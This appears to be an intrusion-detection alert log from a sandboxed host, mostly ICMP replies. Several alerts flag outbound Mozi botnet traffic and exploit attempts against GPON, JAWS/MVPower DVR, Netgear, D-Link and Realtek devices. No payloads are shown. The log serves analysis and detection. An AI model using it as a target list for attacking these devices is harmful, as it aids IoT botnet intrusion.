                                                                                                                  02/06/21-11:35:17.310685ICMP449ICMP Time-To-Live Exceeded in Transit122.248.180.91192.168.2.20
                                                                                                                  02/06/21-11:35:17.343553ICMP449ICMP Time-To-Live Exceeded in Transit124.198.8.13192.168.2.20
                                                                                                                  02/06/21-11:35:19.029839ICMP399ICMP Destination Unreachable Host Unreachable182.76.202.58192.168.2.20
                                                                                                                  02/06/21-11:35:19.029912ICMP399ICMP Destination Unreachable Host Unreachable182.76.202.58192.168.2.20
                                                                                                                  02/06/21-11:35:23.715346ICMP485ICMP Destination Unreachable Communication Administratively Prohibited94.114.71.142192.168.2.20
                                                                                                                  02/06/21-11:35:23.727699ICMP401ICMP Destination Unreachable Network Unreachable80.169.237.142192.168.2.20
                                                                                                                  02/06/21-11:35:23.730197ICMP485ICMP Destination Unreachable Communication Administratively Prohibited79.229.187.191192.168.2.20
                                                                                                                  02/06/21-11:35:24.832626ICMP399ICMP Destination Unreachable Host Unreachable173.219.223.215192.168.2.20
                                                                                                                  02/06/21-11:35:25.024089TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)3887080192.168.2.20151.139.241.251
                                                                                                                  02/06/21-11:35:25.024089TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)3887080192.168.2.20151.139.241.251
                                                                                                                  02/06/21-11:35:26.117699ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.162.120.168192.168.2.20
                                                                                                                  02/06/21-11:35:26.339809ICMP399ICMP Destination Unreachable Host Unreachable179.54.25.2192.168.2.20
                                                                                                                  02/06/21-11:35:28.657132ICMP485ICMP Destination Unreachable Communication Administratively Prohibited188.20.247.252192.168.2.20
                                                                                                                  02/06/21-11:35:28.799286ICMP449ICMP Time-To-Live Exceeded in Transit91.211.44.241192.168.2.20
                                                                                                                  02/06/21-11:35:29.661878ICMP485ICMP Destination Unreachable Communication Administratively Prohibited79.199.18.39192.168.2.20
                                                                                                                  02/06/21-11:35:30.686610ICMP399ICMP Destination Unreachable Host Unreachable89.89.90.95192.168.2.20
                                                                                                                  02/06/21-11:35:30.721662ICMP401ICMP Destination Unreachable Network Unreachable194.81.6.182192.168.2.20
                                                                                                                  02/06/21-11:35:30.724365ICMP402ICMP Destination Unreachable Port Unreachable185.198.59.136192.168.2.20
                                                                                                                  02/06/21-11:35:30.854342ICMP485ICMP Destination Unreachable Communication Administratively Prohibited218.248.175.197192.168.2.20
                                                                                                                  02/06/21-11:35:30.879103ICMP402ICMP Destination Unreachable Port Unreachable24.89.98.118192.168.2.20
                                                                                                                  02/06/21-11:35:31.661493ICMP485ICMP Destination Unreachable Communication Administratively Prohibited91.89.22.107192.168.2.20
                                                                                                                  02/06/21-11:35:31.734532ICMP449ICMP Time-To-Live Exceeded in Transit192.168.56.121192.168.2.20
                                                                                                                  02/06/21-11:35:31.751655ICMP485ICMP Destination Unreachable Communication Administratively Prohibited12.91.239.157192.168.2.20
                                                                                                                  02/06/21-11:35:31.785646ICMP399ICMP Destination Unreachable Host Unreachable64.26.200.1192.168.2.20
                                                                                                                  02/06/21-11:35:32.715025ICMP399ICMP Destination Unreachable Host Unreachable83.169.157.214192.168.2.20
                                                                                                                  02/06/21-11:35:32.742952ICMP449ICMP Time-To-Live Exceeded in Transit172.25.58.66192.168.2.20
                                                                                                                  02/06/21-11:35:32.765040ICMP401ICMP Destination Unreachable Network Unreachable166.127.254.2192.168.2.20
                                                                                                                  02/06/21-11:35:33.807399ICMP399ICMP Destination Unreachable Host Unreachable196.41.125.2192.168.2.20
                                                                                                                  02/06/21-11:35:35.807557ICMP399ICMP Destination Unreachable Host Unreachable150.107.95.166192.168.2.20
                                                                                                                  02/06/21-11:35:37.277344ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited81.171.22.94192.168.2.20
                                                                                                                  02/06/21-11:35:37.300557ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited81.171.22.94192.168.2.20
                                                                                                                  02/06/21-11:35:37.714194ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.141.42.51192.168.2.20
                                                                                                                  02/06/21-11:35:37.925965ICMP449ICMP Time-To-Live Exceeded in Transit135.0.255.30192.168.2.20
                                                                                                                  02/06/21-11:35:38.784723ICMP449ICMP Time-To-Live Exceeded in Transit206.80.241.1192.168.2.20
                                                                                                                  02/06/21-11:35:39.400689UDP2030919ET TROJAN Mozi Botnet DHT Config Sent6881898736.89.55.95192.168.2.20
                                                                                                                  02/06/21-11:35:39.717759ICMP402ICMP Destination Unreachable Port Unreachable173.249.44.186192.168.2.20
                                                                                                                  02/06/21-11:35:40.868340ICMP399ICMP Destination Unreachable Host Unreachable191.248.232.23192.168.2.20
                                                                                                                  02/06/21-11:35:40.868388ICMP399ICMP Destination Unreachable Host Unreachable191.248.232.23192.168.2.20
                                                                                                                  02/06/21-11:35:42.439610ICMP402ICMP Destination Unreachable Port Unreachable109.252.25.27192.168.2.20
                                                                                                                  02/06/21-11:35:43.591576ICMP402ICMP Destination Unreachable Port Unreachable117.194.164.205192.168.2.20
                                                                                                                  02/06/21-11:35:43.949962ICMP399ICMP Destination Unreachable Host Unreachable191.248.232.23192.168.2.20
                                                                                                                  02/06/21-11:35:44.710908ICMP401ICMP Destination Unreachable Network Unreachable88.86.98.50192.168.2.20
                                                                                                                  02/06/21-11:35:44.781679ICMP449ICMP Time-To-Live Exceeded in Transit217.137.126.215192.168.2.20
                                                                                                                  02/06/21-11:35:45.030978TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4806680192.168.2.20175.203.81.2
                                                                                                                  02/06/21-11:35:45.030978TCP2025883ET EXPLOIT MVPower DVR Shell UCE4806680192.168.2.20175.203.81.2
                                                                                                                  02/06/21-11:35:45.971002ICMP399ICMP Destination Unreachable Host Unreachable220.213.124.170192.168.2.20
                                                                                                                  02/06/21-11:35:47.342605ICMP399ICMP Destination Unreachable Host Unreachable69.166.111.231192.168.2.20
                                                                                                                  02/06/21-11:35:47.862463UDP2030919ET TROJAN Mozi Botnet DHT Config Sent481318987178.141.171.18192.168.2.20
                                                                                                                  02/06/21-11:35:47.903988ICMP399ICMP Destination Unreachable Host Unreachable103.76.171.210192.168.2.20
                                                                                                                  02/06/21-11:35:47.904038ICMP399ICMP Destination Unreachable Host Unreachable103.76.171.210192.168.2.20
                                                                                                                  02/06/21-11:35:50.676418ICMP402ICMP Destination Unreachable Port Unreachable125.164.96.224192.168.2.20
                                                                                                                  02/06/21-11:35:50.904178ICMP399ICMP Destination Unreachable Host Unreachable103.76.171.210192.168.2.20
                                                                                                                  02/06/21-11:35:50.965668ICMP402ICMP Destination Unreachable Port Unreachable60.143.66.7192.168.2.20
                                                                                                                  02/06/21-11:35:51.837572ICMP402ICMP Destination Unreachable Port Unreachable136.49.144.219192.168.2.20
                                                                                                                  02/06/21-11:35:51.917597ICMP449ICMP Time-To-Live Exceeded in Transit192.154.114.61192.168.2.20
                                                                                                                  02/06/21-11:35:52.068750TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4280680192.168.2.20144.76.43.37
                                                                                                                  02/06/21-11:35:55.727919ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                                  02/06/21-11:35:58.801693ICMP449ICMP Time-To-Live Exceeded in Transit8.39.116.5192.168.2.20
                                                                                                                  02/06/21-11:35:58.806410ICMP449ICMP Time-To-Live Exceeded in Transit104.145.12.53192.168.2.20
                                                                                                                  02/06/21-11:35:58.898740TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution3508880192.168.2.2023.254.64.88
                                                                                                                  02/06/21-11:36:01.951307ICMP399ICMP Destination Unreachable Host Unreachable112.189.51.162192.168.2.20
                                                                                                                  02/06/21-11:36:03.439281ICMP449ICMP Time-To-Live Exceeded in Transit192.154.114.61192.168.2.20
                                                                                                                  02/06/21-11:36:04.656279ICMP402ICMP Destination Unreachable Port Unreachable89.64.127.15192.168.2.20
                                                                                                                  02/06/21-11:36:09.500178UDP2030919ET TROJAN Mozi Botnet DHT Config Sent5353898759.97.168.156192.168.2.20
                                                                                                                  02/06/21-11:36:12.729744ICMP449ICMP Time-To-Live Exceeded in Transit62.117.4.18192.168.2.20
                                                                                                                  02/06/21-11:36:12.742750ICMP485ICMP Destination Unreachable Communication Administratively Prohibited158.39.1.58192.168.2.20
                                                                                                                  02/06/21-11:36:12.756492ICMP449ICMP Time-To-Live Exceeded in Transit212.106.159.26192.168.2.20
                                                                                                                  02/06/21-11:36:15.231399ICMP449ICMP Time-To-Live Exceeded in Transit192.154.114.61192.168.2.20
                                                                                                                  02/06/21-11:36:15.818281ICMP399ICMP Destination Unreachable Host Unreachable165.73.223.250192.168.2.20
                                                                                                                  02/06/21-11:36:15.818329ICMP399ICMP Destination Unreachable Host Unreachable165.73.223.250192.168.2.20
                                                                                                                  02/06/21-11:36:18.818838ICMP399ICMP Destination Unreachable Host Unreachable165.73.223.250192.168.2.20
                                                                                                                  02/06/21-11:36:19.866398ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited104.165.238.97192.168.2.20
                                                                                                                  02/06/21-11:36:20.104548TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)4603080192.168.2.20203.46.145.77
                                                                                                                  02/06/21-11:36:20.104548TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)4603080192.168.2.20203.46.145.77
                                                                                                                  02/06/21-11:36:22.713560ICMP399ICMP Destination Unreachable Host Unreachable80.241.21.18192.168.2.20
                                                                                                                  02/06/21-11:36:22.810300ICMP399ICMP Destination Unreachable Host Unreachable73.194.248.204192.168.2.20
                                                                                                                  02/06/21-11:36:22.810353ICMP399ICMP Destination Unreachable Host Unreachable73.194.248.204192.168.2.20
                                                                                                                  02/06/21-11:36:22.821437ICMP399ICMP Destination Unreachable Host Unreachable73.194.248.204192.168.2.20
                                                                                                                  02/06/21-11:36:26.710888ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.185.94.208192.168.2.20
                                                                                                                  02/06/21-11:36:26.723765ICMP485ICMP Destination Unreachable Communication Administratively Prohibited93.224.238.149192.168.2.20
                                                                                                                  02/06/21-11:36:26.938760TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4939880192.168.2.2023.217.12.208
                                                                                                                  02/06/21-11:36:26.944220ICMP449ICMP Time-To-Live Exceeded in Transit179.54.18.78192.168.2.20
                                                                                                                  02/06/21-11:36:26.950677ICMP399ICMP Destination Unreachable Host Unreachable10.31.254.178192.168.2.20
                                                                                                                  02/06/21-11:36:26.938760TCP2025883ET EXPLOIT MVPower DVR Shell UCE4939880192.168.2.2023.217.12.208
                                                                                                                  02/06/21-11:36:27.137349TCP1200ATTACK-RESPONSES Invalid URL804939823.217.12.208192.168.2.20
                                                                                                                  02/06/21-11:36:29.769190TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5135880192.168.2.20172.67.201.119
                                                                                                                  02/06/21-11:36:29.769190TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5135880192.168.2.20172.67.201.119
                                                                                                                  02/06/21-11:36:29.884781ICMP449ICMP Time-To-Live Exceeded in Transit180.211.169.82192.168.2.20
                                                                                                                  02/06/21-11:36:33.860372TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3282880192.168.2.2047.246.22.230
                                                                                                                  02/06/21-11:36:33.911284TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6069880192.168.2.20159.140.205.214
                                                                                                                  02/06/21-11:36:33.860372TCP2025883ET EXPLOIT MVPower DVR Shell UCE3282880192.168.2.2047.246.22.230
                                                                                                                  02/06/21-11:36:33.991324TCP1201ATTACK-RESPONSES 403 Forbidden803282847.246.22.230192.168.2.20
                                                                                                                  02/06/21-11:36:34.037516ICMP449ICMP Time-To-Live Exceeded in Transit192.168.10.1192.168.2.20
                                                                                                                  02/06/21-11:36:36.887426ICMP399ICMP Destination Unreachable Host Unreachable113.36.94.1192.168.2.20
                                                                                                                  02/06/21-11:36:37.583861ICMP399ICMP Destination Unreachable Host Unreachable46.212.2.80192.168.2.20
                                                                                                                  02/06/21-11:36:37.590818ICMP399ICMP Destination Unreachable Host Unreachable46.212.2.80192.168.2.20
                                                                                                                  02/06/21-11:36:37.590859ICMP399ICMP Destination Unreachable Host Unreachable46.212.2.80192.168.2.20
                                                                                                                  02/06/21-11:36:38.816725ICMP449ICMP Time-To-Live Exceeded in Transit192.154.114.61192.168.2.20
                                                                                                                  02/06/21-11:36:39.239488ICMP399ICMP Destination Unreachable Host Unreachable113.36.94.1192.168.2.20
                                                                                                                  02/06/21-11:36:39.280354ICMP449ICMP Time-To-Live Exceeded in Transit203.160.187.2192.168.2.20
                                                                                                                  02/06/21-11:36:41.622741ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.159.88.60192.168.2.20
                                                                                                                  02/06/21-11:36:41.982966ICMP399ICMP Destination Unreachable Host Unreachable45.189.200.1192.168.2.20
                                                                                                                  02/06/21-11:36:41.983013ICMP399ICMP Destination Unreachable Host Unreachable45.189.200.1192.168.2.20
                                                                                                                  02/06/21-11:36:43.763720ICMP485ICMP Destination Unreachable Communication Administratively Prohibited188.101.189.42192.168.2.20
                                                                                                                  02/06/21-11:36:43.976222ICMP399ICMP Destination Unreachable Host Unreachable179.9.64.80192.168.2.20
                                                                                                                  02/06/21-11:36:43.976273ICMP399ICMP Destination Unreachable Host Unreachable179.9.64.80192.168.2.20
                                                                                                                  02/06/21-11:36:43.976292ICMP399ICMP Destination Unreachable Host Unreachable179.9.64.80192.168.2.20
                                                                                                                  02/06/21-11:36:44.725670ICMP485ICMP Destination Unreachable Communication Administratively Prohibited93.193.139.218192.168.2.20
                                                                                                                  02/06/21-11:36:44.982998ICMP399ICMP Destination Unreachable Host Unreachable45.189.200.1192.168.2.20
                                                                                                                  02/06/21-11:36:45.219771ICMP399ICMP Destination Unreachable Host Unreachable74.127.237.186192.168.2.20
                                                                                                                  02/06/21-11:36:45.219823ICMP399ICMP Destination Unreachable Host Unreachable74.127.237.186192.168.2.20
                                                                                                                  02/06/21-11:36:45.219928ICMP399ICMP Destination Unreachable Host Unreachable74.127.237.186192.168.2.20
                                                                                                                  02/06/21-11:36:47.720119ICMP399ICMP Destination Unreachable Host Unreachable46.29.176.109192.168.2.20
                                                                                                                  02/06/21-11:36:47.829721ICMP485ICMP Destination Unreachable Communication Administratively Prohibited66.169.97.135192.168.2.20
                                                                                                                  02/06/21-11:36:47.936843TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6019880192.168.2.2024.239.192.38
                                                                                                                  02/06/21-11:36:47.954701TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5898880192.168.2.2013.89.231.175
                                                                                                                  02/06/21-11:36:47.936843TCP2025883ET EXPLOIT MVPower DVR Shell UCE6019880192.168.2.2024.239.192.38
                                                                                                                  02/06/21-11:36:47.954701TCP2025883ET EXPLOIT MVPower DVR Shell UCE5898880192.168.2.2013.89.231.175
                                                                                                                  02/06/21-11:36:48.215275ICMP449ICMP Time-To-Live Exceeded in Transit202.152.175.145192.168.2.20
                                                                                                                  02/06/21-11:36:48.014180TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution3637280192.168.2.20113.161.185.44
                                                                                                                  02/06/21-11:36:50.970528ICMP399ICMP Destination Unreachable Host Unreachable202.239.98.106192.168.2.20
                                                                                                                  02/06/21-11:36:50.970569ICMP399ICMP Destination Unreachable Host Unreachable202.239.98.106192.168.2.20
                                                                                                                  02/06/21-11:36:50.970588ICMP399ICMP Destination Unreachable Host Unreachable202.239.98.106192.168.2.20
                                                                                                                  02/06/21-11:36:54.750679ICMP449ICMP Time-To-Live Exceeded in Transit216.66.80.222192.168.2.20
                                                                                                                  02/06/21-11:36:55.008847ICMP399ICMP Destination Unreachable Host Unreachable187.95.254.41192.168.2.20
                                                                                                                  02/06/21-11:36:54.947835TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5741480192.168.2.2041.57.99.92
                                                                                                                  02/06/21-11:36:54.947835TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5741480192.168.2.2041.57.99.92
                                                                                                                  02/06/21-11:36:55.362935ICMP399ICMP Destination Unreachable Host Unreachable46.83.254.38192.168.2.20
                                                                                                                  02/06/21-11:36:55.819859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5627452869192.168.2.20176.116.205.200
                                                                                                                  02/06/21-11:36:57.700254ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                                  02/06/21-11:36:57.803074ICMP449ICMP Time-To-Live Exceeded in Transit170.39.196.42192.168.2.20
                                                                                                                  02/06/21-11:36:58.075360ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.167.162.206192.168.2.20
                                                                                                                  02/06/21-11:36:58.839452ICMP449ICMP Time-To-Live Exceeded in Transit12.83.40.125192.168.2.20
                                                                                                                  02/06/21-11:37:01.766207ICMP449ICMP Time-To-Live Exceeded in Transit80.250.191.54192.168.2.20
                                                                                                                  02/06/21-11:37:01.952404ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited154.85.22.47192.168.2.20
                                                                                                                  02/06/21-11:37:01.979514TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4852480192.168.2.20193.248.153.76
                                                                                                                  02/06/21-11:37:04.904623ICMP449ICMP Time-To-Live Exceeded in Transit198.202.27.75192.168.2.20
                                                                                                                  02/06/21-11:37:08.978776ICMP449ICMP Time-To-Live Exceeded in Transit133.101.244.12192.168.2.20
                                                                                                                  02/06/21-11:37:11.468448ICMP399ICMP Destination Unreachable Host Unreachable93.189.172.1192.168.2.20
                                                                                                                  02/06/21-11:37:11.468494ICMP399ICMP Destination Unreachable Host Unreachable93.189.172.1192.168.2.20
                                                                                                                  02/06/21-11:37:11.958114ICMP399ICMP Destination Unreachable Host Unreachable201.218.129.193192.168.2.20
                                                                                                                  02/06/21-11:37:11.958176ICMP399ICMP Destination Unreachable Host Unreachable201.218.129.193192.168.2.20
                                                                                                                  02/06/21-11:37:14.572334ICMP399ICMP Destination Unreachable Host Unreachable93.189.172.1192.168.2.20
                                                                                                                  02/06/21-11:37:14.955628ICMP399ICMP Destination Unreachable Host Unreachable201.218.129.193192.168.2.20
                                                                                                                  02/06/21-11:37:15.726703UDP2030919ET TROJAN Mozi Botnet DHT Config Sent19008987178.141.70.255192.168.2.20
                                                                                                                  02/06/21-11:37:15.732269ICMP449ICMP Time-To-Live Exceeded in Transit185.53.64.10192.168.2.20
                                                                                                                  02/06/21-11:37:16.898341TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5508680192.168.2.2074.79.213.38
                                                                                                                  02/06/21-11:37:16.898341TCP2025883ET EXPLOIT MVPower DVR Shell UCE5508680192.168.2.2074.79.213.38
                                                                                                                  02/06/21-11:37:18.727646ICMP485ICMP Destination Unreachable Communication Administratively Prohibited94.216.193.84192.168.2.20
                                                                                                                  02/06/21-11:37:22.315924ICMP399ICMP Destination Unreachable Host Unreachable213.88.203.94192.168.2.20
                                                                                                                  02/06/21-11:37:23.765324ICMP485ICMP Destination Unreachable Communication Administratively Prohibited217.7.204.55192.168.2.20
                                                                                                                  02/06/21-11:37:23.057007TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4031680192.168.2.20156.225.150.183
                                                                                                                  02/06/21-11:37:23.057007TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4031680192.168.2.20156.225.150.183
                                                                                                                  02/06/21-11:37:23.969428TCP1201ATTACK-RESPONSES 403 Forbidden8040316156.225.150.183192.168.2.20
                                                                                                                  02/06/21-11:37:25.949588ICMP449ICMP Time-To-Live Exceeded in Transit200.130.102.2192.168.2.20
                                                                                                                  02/06/21-11:37:29.760624ICMP485ICMP Destination Unreachable Communication Administratively Prohibited92.45.252.1192.168.2.20
                                                                                                                  02/06/21-11:37:29.880380ICMP449ICMP Time-To-Live Exceeded in Transit59.180.210.210192.168.2.20
                                                                                                                  02/06/21-11:37:30.823169ICMP399ICMP Destination Unreachable Host Unreachable24.124.216.86192.168.2.20
                                                                                                                  02/06/21-11:37:32.144381ICMP449ICMP Time-To-Live Exceeded in Transit152.255.157.71192.168.2.20
                                                                                                                  02/06/21-11:37:32.716325ICMP402ICMP Destination Unreachable Port Unreachable176.20.218.166192.168.2.20
                                                                                                                  02/06/21-11:37:36.986741TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3277680192.168.2.2023.236.242.26
                                                                                                                  02/06/21-11:37:36.986741TCP2025883ET EXPLOIT MVPower DVR Shell UCE3277680192.168.2.2023.236.242.26
                                                                                                                  02/06/21-11:37:38.510012UDP2030919ET TROJAN Mozi Botnet DHT Config Sent1027898759.96.39.49192.168.2.20
                                                                                                                  02/06/21-11:37:39.948030ICMP399ICMP Destination Unreachable Host Unreachable192.168.1.238192.168.2.20
                                                                                                                  02/06/21-11:37:39.948069ICMP399ICMP Destination Unreachable Host Unreachable192.168.1.238192.168.2.20
                                                                                                                  02/06/21-11:37:40.756258ICMP485ICMP Destination Unreachable Communication Administratively Prohibited91.96.55.112192.168.2.20
                                                                                                                  02/06/21-11:37:41.912420ICMP449ICMP Time-To-Live Exceeded in Transit204.225.31.22192.168.2.20
                                                                                                                  02/06/21-11:37:42.948151ICMP399ICMP Destination Unreachable Host Unreachable192.168.1.238192.168.2.20
                                                                                                                  02/06/21-11:37:43.980493ICMP401ICMP Destination Unreachable Network Unreachable193.50.198.5192.168.2.20
                                                                                                                  02/06/21-11:37:44.010181ICMP449ICMP Time-To-Live Exceeded in Transit203.13.23.2192.168.2.20
                                                                                                                  02/06/21-11:37:44.021265TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5445480192.168.2.2023.12.191.118
                                                                                                                  02/06/21-11:37:44.021265TCP2025883ET EXPLOIT MVPower DVR Shell UCE5445480192.168.2.2023.12.191.118
                                                                                                                  02/06/21-11:37:44.289354TCP1200ATTACK-RESPONSES Invalid URL805445423.12.191.118192.168.2.20
                                                                                                                  02/06/21-11:37:45.761796ICMP449ICMP Time-To-Live Exceeded in Transit130.93.107.38192.168.2.20
                                                                                                                  02/06/21-11:37:46.778093ICMP399ICMP Destination Unreachable Host Unreachable207.252.72.17192.168.2.20
                                                                                                                  02/06/21-11:37:46.778139ICMP399ICMP Destination Unreachable Host Unreachable207.252.72.17192.168.2.20
                                                                                                                  02/06/21-11:37:46.816617ICMP399ICMP Destination Unreachable Host Unreachable96.110.161.14192.168.2.20
                                                                                                                  02/06/21-11:37:49.778035ICMP399ICMP Destination Unreachable Host Unreachable207.252.72.17192.168.2.20
                                                                                                                  02/06/21-11:37:50.712635ICMP485ICMP Destination Unreachable Communication Administratively Prohibited80.255.14.222192.168.2.20
                                                                                                                  02/06/21-11:37:50.833848ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited131.100.27.86192.168.2.20
                                                                                                                  02/06/21-11:37:50.842205ICMP449ICMP Time-To-Live Exceeded in Transit137.103.65.26192.168.2.20
                                                                                                                  02/06/21-11:37:51.033629TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5983280192.168.2.2023.53.160.36
                                                                                                                  02/06/21-11:37:51.033629TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5983280192.168.2.2023.53.160.36
                                                                                                                  02/06/21-11:37:51.310208TCP1200ATTACK-RESPONSES Invalid URL805983223.53.160.36192.168.2.20
                                                                                                                  02/06/21-11:37:53.300148ICMP399ICMP Destination Unreachable Host Unreachable84.246.147.2192.168.2.20
                                                                                                                  02/06/21-11:37:53.300195ICMP399ICMP Destination Unreachable Host Unreachable84.246.147.2192.168.2.20
                                                                                                                  02/06/21-11:37:53.873838ICMP399ICMP Destination Unreachable Host Unreachable24.30.175.202192.168.2.20
                                                                                                                  02/06/21-11:37:56.350054ICMP399ICMP Destination Unreachable Host Unreachable84.246.147.2192.168.2.20
                                                                                                                  02/06/21-11:37:56.616942ICMP399ICMP Destination Unreachable Host Unreachable154.54.44.198192.168.2.20
                                                                                                                  02/06/21-11:37:57.715239ICMP485ICMP Destination Unreachable Communication Administratively Prohibited77.7.89.221192.168.2.20
                                                                                                                  02/06/21-11:37:57.798034ICMP485ICMP Destination Unreachable Communication Administratively Prohibited149.28.33.22192.168.2.20
                                                                                                                  02/06/21-11:37:58.016734ICMP449ICMP Time-To-Live Exceeded in Transit211.122.27.21192.168.2.20
                                                                                                                  02/06/21-11:38:01.420928ICMP399ICMP Destination Unreachable Host Unreachable154.54.44.198192.168.2.20
                                                                                                                  02/06/21-11:38:02.713757ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                                  02/06/21-11:38:04.710872ICMP485ICMP Destination Unreachable Communication Administratively Prohibited213.222.29.194192.168.2.20
                                                                                                                  02/06/21-11:38:04.717516ICMP485ICMP Destination Unreachable Communication Administratively Prohibited93.221.222.106192.168.2.20
                                                                                                                  02/06/21-11:38:05.743998ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                                  02/06/21-11:38:07.142713ICMP399ICMP Destination Unreachable Host Unreachable37.132.182.1192.168.2.20
                                                                                                                  02/06/21-11:38:10.845917UDP2030919ET TROJAN Mozi Botnet DHT Config Sent630328987116.68.99.187192.168.2.20
                                                                                                                  02/06/21-11:38:11.732172ICMP402ICMP Destination Unreachable Port Unreachable192.109.241.43192.168.2.20
                                                                                                                  02/06/21-11:38:11.782967ICMP399ICMP Destination Unreachable Host Unreachable217.121.74.29192.168.2.20
                                                                                                                  02/06/21-11:38:11.804956ICMP399ICMP Destination Unreachable Host Unreachable91.135.147.130192.168.2.20
                                                                                                                  02/06/21-11:38:12.165410UDP2030919ET TROJAN Mozi Botnet DHT Config Sent331789875.106.1.251192.168.2.20
                                                                                                                  02/06/21-11:38:13.767190ICMP449ICMP Time-To-Live Exceeded in Transit81.31.150.226192.168.2.20
                                                                                                                  02/06/21-11:38:18.714808ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.149.61.90192.168.2.20
                                                                                                                  02/06/21-11:38:18.843715ICMP449ICMP Time-To-Live Exceeded in Transit78.38.241.74192.168.2.20
                                                                                                                  02/06/21-11:38:21.574740ICMP399ICMP Destination Unreachable Host Unreachable103.24.165.198192.168.2.20
                                                                                                                  02/06/21-11:38:21.574816ICMP399ICMP Destination Unreachable Host Unreachable103.24.165.198192.168.2.20
                                                                                                                  02/06/21-11:38:22.828774ICMP485ICMP Destination Unreachable Communication Administratively Prohibited63.148.112.178192.168.2.20
                                                                                                                  02/06/21-11:38:24.778537ICMP399ICMP Destination Unreachable Host Unreachable103.24.165.198192.168.2.20
                                                                                                                  02/06/21-11:38:25.853257ICMP449ICMP Time-To-Live Exceeded in Transit67.142.145.156192.168.2.20
                                                                                                                  02/06/21-11:38:28.774643ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited212.149.148.17192.168.2.20
                                                                                                                  02/06/21-11:38:28.859281ICMP399ICMP Destination Unreachable Host Unreachable192.168.221.30192.168.2.20
                                                                                                                  02/06/21-11:38:28.859548ICMP399ICMP Destination Unreachable Host Unreachable192.168.221.30192.168.2.20
                                                                                                                  02/06/21-11:38:28.846886TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound3974880192.168.2.202.22.143.222
                                                                                                                  02/06/21-11:38:28.846886TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution3974880192.168.2.202.22.143.222
                                                                                                                  02/06/21-11:38:28.901905TCP1200ATTACK-RESPONSES Invalid URL80397482.22.143.222192.168.2.20
                                                                                                                  02/06/21-11:38:30.950724ICMP402ICMP Destination Unreachable Port Unreachable89.64.16.63192.168.2.20
                                                                                                                  02/06/21-11:38:31.859373ICMP399ICMP Destination Unreachable Host Unreachable192.168.221.30192.168.2.20
                                                                                                                  02/06/21-11:38:32.014237ICMP399ICMP Destination Unreachable Host Unreachable216.66.112.1192.168.2.20
                                                                                                                  02/06/21-11:38:32.014303ICMP399ICMP Destination Unreachable Host Unreachable216.66.112.1192.168.2.20
                                                                                                                  02/06/21-11:38:32.765140ICMP449ICMP Time-To-Live Exceeded in Transit185.33.175.11192.168.2.20
                                                                                                                  02/06/21-11:38:32.842708ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited172.241.192.161192.168.2.20
                                                                                                                  02/06/21-11:38:32.964672TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3323680192.168.2.20180.254.107.55
                                                                                                                  02/06/21-11:38:32.964672TCP2025883ET EXPLOIT MVPower DVR Shell UCE3323680192.168.2.20180.254.107.55
                                                                                                                  02/06/21-11:38:36.759669ICMP449ICMP Time-To-Live Exceeded in Transit217.28.252.209192.168.2.20
                                                                                                                  02/06/21-11:38:37.165035ICMP399ICMP Destination Unreachable Host Unreachable192.168.145.206192.168.2.20
                                                                                                                  02/06/21-11:38:37.165077ICMP399ICMP Destination Unreachable Host Unreachable192.168.145.206192.168.2.20
                                                                                                                  02/06/21-11:38:39.957926ICMP449ICMP Time-To-Live Exceeded in Transit191.6.231.6192.168.2.20
                                                                                                                  02/06/21-11:38:40.171213ICMP399ICMP Destination Unreachable Host Unreachable192.168.145.206192.168.2.20
                                                                                                                  02/06/21-11:38:46.822526ICMP399ICMP Destination Unreachable Host Unreachable10.150.7.30192.168.2.20
